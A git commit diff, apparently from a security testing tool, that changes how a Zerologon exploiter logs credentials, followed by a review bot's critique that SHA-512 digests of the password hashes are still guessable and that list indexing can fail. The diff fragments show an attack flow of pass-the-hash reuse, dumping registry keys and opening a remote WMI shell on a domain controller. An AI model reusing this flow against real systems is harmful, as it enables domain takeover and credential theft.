Encrypt credentials before logging

Shreya 2021-02-24 16:08:36 +05:30
parent 353e9844dc
commit 28edf7d2b7
1 changed files with 10 additions and 7 deletions


@ -163,13 +163,13 @@ class ZerologonExploiter(HostExploiter):
] ]
try: try:
original_pwd_nthash = self.get_original_pwd_nthash( original_pwd_nthash = self.get_original_pwd_nthash(
username, ":".join(user_pwd_hashes) username, user_pwd_hashes
) )
if original_pwd_nthash: if original_pwd_nthash:
break break
except Exception as e: except Exception as e:
LOG.info( LOG.info(
f'Credentials "{user_details}" didn\'t work. Exception: {str(e)}' f"Credentials didn\'t work. Exception: {str(e)}"
) )
if not original_pwd_nthash: if not original_pwd_nthash:
@ -304,7 +304,7 @@ class ZerologonExploiter(HostExploiter):
if nthash not in self._config.exploit_ntlm_hash_list: if nthash not in self._config.exploit_ntlm_hash_list:
self._config.exploit_ntlm_hash_list.append(nthash) self._config.exploit_ntlm_hash_list.append(nthash)
def get_original_pwd_nthash(self, username: str, user_pwd_hashes: str) -> str: def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> str:
if not self.save_HKLM_keys_locally(username, user_pwd_hashes): if not self.save_HKLM_keys_locally(username, user_pwd_hashes):
return return
@ -335,13 +335,16 @@ class ZerologonExploiter(HostExploiter):
finally: finally:
self.remove_locally_saved_HKLM_keys() self.remove_locally_saved_HKLM_keys()
def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: str) -> bool: def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
LOG.debug( LOG.info(
f'Starting remote shell on victim with user: "{username}" and hashes: "{user_pwd_hashes}". ' f'Starting remote shell on victim with credentials:\n'
f'user: {username}\n'
f'hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : '
f'{self._config.hash_sensitive_data(user_pwd_hashes[1])}'
) )
wmiexec = Wmiexec( wmiexec = Wmiexec(
ip=self.dc_ip, username=username, hashes=user_pwd_hashes, domain=self.dc_ip ip=self.dc_ip, username=username, hashes=':'.join(user_pwd_hashes), domain=self.dc_ip
) )
remote_shell = wmiexec.get_remote_shell() remote_shell = wmiexec.get_remote_shell()
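Review bot: The new `LOG.info` call in `save_HKLM_keys_locally` still writes credential-derived values to the log: a SHA-512 digest of each password hash, next to the plaintext username, and now at info rather than debug level. If `hash_sensitive_data` is a plain unsalted SHA-512 (its body is not in this diff), anyone holding the log can confirm a guessed password by recomputing the digest, so the values are pseudonymised rather than protected, and the commit title's "Encrypt" overstates what is done. Indexing `user_pwd_hashes[0]` and `[1]` inside the message also raises IndexError for a list shorter than two before `Wmiexec` is built, which would presumably surface through the caller's `except Exception` in the first hunk as "Credentials didn't work". I would leave the hashes out and log only `f"Starting remote shell on victim with user: {username}"`; the function body continues past the end of this hunk.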